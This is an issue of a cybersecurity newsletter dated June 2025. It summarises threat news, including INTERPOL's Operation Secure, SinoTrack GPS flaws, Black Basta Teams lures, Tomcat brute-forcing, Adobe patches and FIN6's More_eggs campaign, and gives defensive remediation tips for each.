- Mycomputerspot Security Newsletter
- Posts
- Cybersecurity Threats and Trends - 06/10/2025
Cybersecurity Threats and Trends - 06/10/2025
Today's cyber roundup features critical vulnerabilities, cloud security warnings, and sophisticated threat actor tactics...
You found global talent. Deel’s here to help you onboard them
Deel’s simplified a whole planet’s worth of information. It’s time you got your hands on our international compliance handbook where you’ll learn about:
Attracting global talent
Labor laws to consider when hiring
Processing international payroll on time
Staying compliant with employment & tax laws abroad
With 150+ countries right at your fingertips, growing your team with Deel is easier than ever.

While you were busy trying to remember if you actually turned on MFA for your personal email, the cyber underworld was busy innovating new ways to ruin your Monday. Let's dive into this week's digital dumpster fires, shall we?
1. INTERPOL Dismantles 20,000+ Malicious IPs Linked to 69 Malware Variants in Operation Secure
Primary Threat: INTERPOL has announced the dismantling of more than 20,000 malicious IP addresses or domains linked to 69 information-stealing malware variants as part of a coordinated international operation.
Risk: MEDIUM
INTERPOL on Wednesday announced the dismantling of a massive network of malicious infrastructure during Operation Secure (January – April 2025). Law enforcement agencies from 26 countries worked together to locate servers, map physical networks, and execute targeted takedowns. The operation led to 32 arrests, including the suspected ringleader of a cybercriminal organization responsible for developing and distributing information-stealing malware that had claimed more than 216,000 victims globally.
Detection and Remediation Tips:
Update your antivirus and anti-malware solutions to ensure protection against the latest threats
Implement multi-factor authentication for all accounts, especially those containing sensitive information
Be vigilant for phishing attempts that may deliver information-stealing malware
Review your incident response plan to include procedures for potential credential theft
Consider using password managers with breach monitoring capabilities
2. SinoTrack GPS Devices Vulnerable to Remote Vehicle Control via Default Passwords
Primary Threat: Two security vulnerabilities have been disclosed in SinoTrack GPS devices that could be exploited to control certain remote functions on connected vehicles and track their locations due to default passwords.
Risk: HIGH
Security researchers reported that these vulnerabilities affect all versions of the SinoTrack platform and could allow attackers to access device profiles without authorization. The most concerning aspect is that attackers could potentially cut off fuel remotely or track vehicle locations without the owner's knowledge. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory urging users to change default passwords immediately, as no patch is currently available from the manufacturer.
Detection and Remediation Tips:
Change default passwords on all SinoTrack GPS devices immediately
Consider disabling remote control features until a security patch is available
Monitor for unusual activity or unauthorized commands sent to your vehicle
Implement network segmentation to isolate IoT devices from critical systems
Consider alternative GPS tracking solutions with better security practices
3. Former Black Basta Members Use Microsoft Teams and Python Scripts in 2025 Attacks
Primary Threat: Former members of the Black Basta ransomware operation have been observed using Microsoft Teams and Python scripts in their email bombing campaigns targeting finance, insurance, and construction sectors.
Risk: HIGH
Security researchers revealed that these threat actors are leveraging legitimate collaboration tools like Microsoft Teams to establish initial contact with victims, posing as corporate help desks responding to supposed spam attacks. After gaining the victim's trust, they deploy custom Python scripts and cURL commands to deliver malware. This technique allows them to bypass traditional email security controls and exploit the inherent trust users place in official communication channels.
Detection and Remediation Tips:
Train employees to verify the identity of IT support staff, even when contacted through legitimate channels
Implement strict policies for handling unexpected IT support communications
Deploy advanced email security solutions that can detect and block email bombing campaigns
Restrict the execution of scripts and unauthorized applications on endpoint devices
Establish clear escalation procedures for employees to report suspicious IT support requests
Did you know...?
The More_eggs malware used by FIN6 in their LinkedIn attacks has a fascinating technical architecture that makes it particularly dangerous. Unlike conventional malware, More_eggs (also known as Terra Loader or SpicyOmelette) uses a modular approach with components that only execute in memory, making it extremely difficult for traditional antivirus solutions to detect. It employs a technique called "living off the land," where it leverages legitimate Windows processes like regsvr32.exe to load malicious code, blending in with normal system operations. The malware also features sophisticated anti-analysis capabilities, including virtual machine detection and debugger evasion, allowing it to remain undetected for extended periods. Perhaps most concerning is its ability to customize attacks based on the victim's environment, dynamically adapting its behavior to maximize its chances of success—a sobering reminder that modern malware is becoming increasingly sophisticated and targeted.
4. 295 Malicious IPs Launch Coordinated Brute-Force Attack on Apache Tomcat Manager
Primary Threat: Threat intelligence firm GreyNoise has warned of a coordinated brute-force attack targeting Apache Tomcat Manager interfaces from 295 malicious IP addresses.
Risk: HIGH
According to GreyNoise, who warned of the attack, the company observed a surge in brute-force and login attempts on June 5, 2025, indicating deliberate efforts to identify and compromise vulnerable Apache Tomcat instances. The attacking IPs were primarily located in the US, UK, Germany, Netherlands, and France. Once compromised, these servers could be used for cryptocurrency mining, data theft, or as launching points for further attacks on internal networks.
Detection and Remediation Tips:
Change default credentials on all Apache Tomcat Manager interfaces immediately
Implement IP-based access restrictions for management interfaces
Deploy multi-factor authentication for administrative access
Consider using Web Application Firewalls to detect and block brute-force attempts
Monitor server logs for unauthorized access attempts and suspicious activities
5. Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps
Primary Threat: Adobe has released security updates to address a total of 254 security flaws impacting its software products, with a majority affecting Experience Manager and Creative Cloud.
Risk: HIGH
Adobe on Tuesday pushed security updates to address a staggering 254 security flaws across its product line. The most severe vulnerabilities could allow attackers to execute arbitrary code, potentially taking complete control of affected systems. The updates impact both cloud-based and on-premises deployments, with Experience Manager accounting for the majority of the patched vulnerabilities. Some of the flaws could be exploited to achieve privilege escalation, information disclosure, or security feature bypass.
Detection and Remediation Tips:
Apply Adobe's June 2025 security patches immediately across all affected products
Prioritize updating internet-facing systems and those processing sensitive data
Review your Adobe product inventory to ensure all instances are identified and patched
Consider implementing application allowlisting to prevent unauthorized code execution
Monitor for unusual activity that might indicate exploitation attempts
6. FIN6 Uses AWS-Hosted Fake Resumes on LinkedIn to Deliver More_eggs Malwarek
Primary Threat: The financially motivated threat actor FIN6 has been observed leveraging fake resumes hosted on AWS infrastructure to deliver More_eggs malware via LinkedIn.
Risk: MEDIUM
Security researchers reported that FIN6 is targeting recruiters and HR professionals with convincing fake resumes that link to malicious AWS-hosted portfolio websites. When victims click on the resume links, they're redirected to these sites, which deliver the More_eggs backdoor malware. This sophisticated malware facilitates credential theft, system access, and follow-on attacks, including ransomware deployment. FIN6 is known for targeting point-of-sale systems and stealing payment card data, with estimated thefts exceeding $400 million since 2018.
Detection and Remediation Tips:
Train HR and recruitment staff to recognize suspicious resume links and attachments
Implement advanced email security solutions with URL filtering capabilities
Consider using isolated browsing environments when reviewing job applications
Deploy endpoint detection and response (EDR) solutions to detect More_eggs indicators
Establish clear procedures for verifying the legitimacy of job applicant materials
IN SUMMARY:
From international law enforcement operations dismantling malware infrastructure to critical vulnerabilities in GPS devices and sophisticated social engineering campaigns, this week's threats demonstrate the diverse and evolving nature of the cybersecurity landscape. The coordinated attacks against Apache Tomcat Manager and the massive Adobe patch release highlight the ongoing challenges organizations face in maintaining secure systems, while the FIN6 campaign shows how threat actors continue to innovate their tactics to bypass security controls.
🚨 Key Takeaways:
✔️ International cooperation remains crucial in disrupting cybercriminal operations, as demonstrated by INTERPOL's Operation Secure.
✔️ IoT security vulnerabilities can have real-world physical implications, as seen with the SinoTrack GPS device flaws.
✔️ Threat actors are increasingly leveraging legitimate collaboration tools like Microsoft Teams to establish initial access.
✔️ Coordinated brute-force attacks continue to target common administrative interfaces, highlighting the importance of strong authentication.
✔️ The sheer volume of vulnerabilities in popular software like Adobe products creates significant patching challenges for organizations.
✔️ Social engineering tactics are becoming more sophisticated, with threat actors creating convincing fake personas to deliver malware.
🔎 Immediate Actions:
✔️ Change default passwords on all network-connected devices, especially IoT devices like GPS trackers.
✔️ Apply Adobe's June 2025 security patches immediately across all affected products.
✔️ Implement strict verification procedures for IT support communications, even when through legitimate channels.
✔️ Secure Apache Tomcat Manager interfaces with strong authentication and IP restrictions.
✔️ Train HR and recruitment staff to recognize suspicious resume links and attachments.
✔️ Update antivirus and anti-malware solutions to protect against the latest information-stealing malware variants.
💡 Stay vigilant, patch promptly, and remember that in cybersecurity, paranoia isn't a disorder – it's a job requirement. 💡
J.W.
(P.S. Check out our partners! It goes a long way to support this newsletter!)